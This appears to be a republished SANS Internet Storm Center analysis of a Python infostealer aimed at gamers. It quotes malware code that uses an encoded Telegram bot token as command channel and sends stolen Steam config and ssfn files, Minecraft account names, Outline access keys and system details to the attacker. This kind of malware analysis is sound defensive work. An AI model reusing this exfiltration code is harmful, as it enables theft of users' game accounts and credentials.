Python Infostealer Targeting Gamers, (Wed, Mar 1st)

This post was originally published on this site

They are a lot of “gamers” on the Internet. They generate a lot of business around games. Many of them can be downloaded for free, but they have online shops to buy options like extra lives, weapons, suits, packages, etc. Therefore, the business of gaming is very lucrative today[1].

I spotted a malicious Python script that acts as an info stealer focusing on gamers! Based on strings found in the code, the attribution goes to Russia (“Произошёл запуск” can be translated to "a new connection has been established”).

Today, most Python malicious scripts use Discord as a C2, but this one uses Telegram:

bot = telebot.TeleBot(base64.b64decode("NTk1OTUwNzYxODpBQUhmNzBRcVBYMkNiNHNjSzkyZGJwZnVhTEVaQlNWdkVRWQ==").decode("utf-8"), parse_mode=None)

The script implements the classic code to steal cookies and credentials from a Chrome installation, but it also searches for resources used by gamers.

First, Chrome data is inspected, and only interesting domains are searched:

target_domain = [

Then, the script searches for the presence of Minecraft:

if os.path.isdir(apps["Minecraft"]):
    AccountsPath = apps["Minecraft"] + "launcher_accounts_microsoft_store.json"
    with open(AccountsPath, encoding="utf-8", mode="r") as f:
        file = json.load(f)
        for account in file["accounts"]:
            ms_username = file["accounts"][account]["username"]
            minecraft_username = file["accounts"][account]["minecraftProfile"]["name"]
            for user in send_to_users:
                bot.send_message(user, f"?Minecraft Installedn?Microsoft: `{ms_username}`n?Minecraft: `{minecraft_username}`", parse_mode="MARKDOWN")
    except KeyError:

Steam[2] is a well-known platform for downloading games. The script tries to exfiltrate useful information from a Steam setup:

    steam_reg = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path_steam, 0, access=winreg.KEY_READ)
    steampath = winreg.EnumValue(steam_reg, 2)[1]
    steam_auto_login = (winreg.EnumValue(steam_reg, 8))[1]
    steam_lang = (winreg.EnumValue(steam_reg, 0))[1]
    steam_config = steampath + "/config/config.vdf"
    steam_users = steampath + "/config/loginusers.vdf"
    steam_ssfn = []
    for filename in os.listdir(steampath):
        if "ssfn" in filename:
    steam_installed = True

except FileNotFoundError:
    steam_auto_login = "not installed"
    steam_lang = "undefined"
    steam_installed = False

send_to_users = [1084445274]

for user in send_to_users:
    bot.send_message(user, f"Произошёл запуск `{}`n?IP: `{stun.get_ip_info()}`n?Computer Name:  `{socket.gethostname()}`n??User:  `{os.getlogin()}`n?OC:  `{platform.platform()}`n??Steam Login: `{steam_auto_login}`n?Steam Language: `{steam_lang}`", parse_mode="MARKDOWN")
    if steam_installed == True:
        bot.send_message(user, "=====STEAM FILES=====", parse_mode="MARKDOWN")
        bot.send_document(user, open(steam_config, "r", encoding="utf-8"), caption="steam_config")
        bot.send_document(user, open(steam_users, "r", encoding="utf-8"), caption="steam_users")
        for filename in steam_ssfn:
            with open(f"{steampath}/{filename}", "rb") as file:
                bot.send_document(user, file, caption=f"`{filename}`", parse_mode="MARKDOWN")

They also search for Outline Manager instances:

if os.path.isdir(apps["Outline"]):
    AccountsPath = apps["Outline"] + "000003.log"
    with open(AccountsPath, mode="r") as file:
        for string in
            if "accessKey" in string:
                key = string
    reg = re.compile('[^a-zA-Z0-9"@.,:/?-]')
    key = reg.sub('', key)

    for user in send_to_users:
        bot.send_message(user, f"?Outline (LOG): `{key}`", parse_mode="MARKDOWN")

Nothing brand new with this sample except it targets gamers. Money is involved with games (sometimes a lot), so they are nice targets for attackers. Stay safe!


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.